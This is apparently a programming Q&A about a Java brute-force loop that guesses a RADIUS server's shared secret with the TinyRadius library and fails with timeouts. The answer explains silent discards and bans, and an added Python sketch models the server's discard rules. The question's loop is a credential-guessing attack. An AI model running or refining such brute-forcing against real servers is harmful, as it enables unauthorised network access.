java, radius-protocol

Unable To Connect To RADIUS Server


So I have a RADIUS server running at 10.0.0.15. I have to brute-force its shared secret. I am using the TinyRadius Java library.

Here is my code:

        String s = "big line...";
        String[] words = s.split("\\W+");
        String host, userName, password;
        userName = "admin";
        password = "pass";
        host = "10.0.0.15";
        int count = words.length;
        for (String word : words) {
            // Decrement so the counter really shows how many words are left
            System.err.println("Left: " + count--);
            RadiusClient rc = new RadiusClient(host, word);
            try {
                if (rc.authenticate(userName, password)) {
                    System.out.print("Cracked. Secret is: " + word);
                    break;
                }
            } catch (IOException ex) {
                // A receive timeout (no reply from the server) ends up here
                Logger.getLogger(RadiusBrute.class.getName()).log(Level.SEVERE, null, ex);
            } catch (RadiusException ex) {
                Logger.getLogger(RadiusBrute.class.getName()).log(Level.SEVERE, null, ex);
            }
        }

However, every time I run this, I get this error:

Jun 21, 2016 12:48:28 AM org.tinyradius.util.RadiusClient communicate
SEVERE: communication failure (timeout), no more retries
Jun 21, 2016 12:48:28 AM radiusbrute.RadiusBrute main
SEVERE: null
java.net.SocketTimeoutException: Receive timed out
        at java.net.PlainDatagramSocketImpl.receive0(Native Method)
        at java.net.AbstractPlainDatagramSocketImpl.receive(AbstractPlainDatagramSocketImpl.java:144)
        at java.net.DatagramSocket.receive(DatagramSocket.java:812)
        at org.tinyradius.util.RadiusClient.communicate(RadiusClient.java:249)
        at org.tinyradius.util.RadiusClient.authenticate(RadiusClient.java:83)
        at org.tinyradius.util.RadiusClient.authenticate(RadiusClient.java:65)
        at radiusbrute.RadiusBrute.main(RadiusBrute.java:284)

What have I done wrong? Thanks.


Solution

  • It looks like your RADIUS server silently discarded your RADIUS Access-Request. Depending on the RADIUS server implementation, the reason could be one of the following:

    1. The RADIUS server doesn't have the host you send your requests from as a configured client. From RADIUS RFC 2865:

       A request from a client for which the RADIUS server does not have a shared secret MUST be silently discarded.

    2. You sent too many failed requests from your client, and the RADIUS server banned your client by its IP address and drops all subsequent requests.

    3. (Unlikely) The RADIUS server is configured to drop requests with a wrong username/password instead of sending a RADIUS Access-Reject.
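
The three discard cases from the answer, modelled from the server's side as an added example (not part of the original answer and not TinyRadius or any real server's code). `FrontDoor`, its ban threshold, the `credentials_ok` flag that stands in for the password check, and the sample addresses and secret are assumptions made for illustration; `None` means the server sends nothing, which the client sees as a receive timeout.

```python
import hashlib
import struct
from collections import Counter

ACCESS_REQUEST, ACCESS_ACCEPT, ACCESS_REJECT = 1, 2, 3  # RFC 2865 packet codes


class FrontDoor:
    """Server-side decision for one Access-Request datagram (no sockets)."""

    def __init__(self, clients, max_failures=3, drop_bad_credentials=False):
        self.clients = clients              # source IP -> shared secret (bytes)
        self.max_failures = max_failures    # assumed ban threshold
        self.drop_bad_credentials = drop_bad_credentials
        self.failures = Counter()           # failed attempts per source IP
        self.log = []                       # (source IP, reason) for the operator

    def handle(self, src_ip, datagram, credentials_ok):
        secret = self.clients.get(src_ip)
        if secret is None:                  # case 1: no shared secret for this host
            return self._drop(src_ip, "unknown client")
        if self.failures[src_ip] >= self.max_failures:  # case 2: source is banned
            return self._drop(src_ip, "banned")
        # Header is Code, Identifier, Length; a short datagram fails the length test.
        code, ident, length = struct.unpack("!BBH", datagram[:4].ljust(4, b"\0"))
        if code != ACCESS_REQUEST or not 20 <= length <= len(datagram):
            return self._drop(src_ip, "malformed")
        if credentials_ok:
            self.failures[src_ip] = 0
            return self._reply(ACCESS_ACCEPT, ident, datagram[4:20], secret)
        self.failures[src_ip] += 1
        if self.drop_bad_credentials:       # case 3: silence instead of a reject
            return self._drop(src_ip, "bad credentials")
        return self._reply(ACCESS_REJECT, ident, datagram[4:20], secret)

    def _drop(self, src_ip, reason):
        self.log.append((src_ip, reason))   # the only trace a silent discard leaves
        return None

    @staticmethod
    def _reply(code, ident, request_auth, secret):
        # Response Authenticator = MD5(Code+ID+Length+RequestAuth+Attributes+Secret)
        head = struct.pack("!BBH", code, ident, 20)
        return head + hashlib.md5(head + request_auth + secret).digest()


def sample_request(ident=1):
    # Constructed sample: header plus an all-zero authenticator, attributes omitted.
    return struct.pack("!BBH", ACCESS_REQUEST, ident, 20) + bytes(16)
```

In all three cases the reason is visible only in the server's own log, so that log (and the server's client list) is where to look when a client reports timeouts.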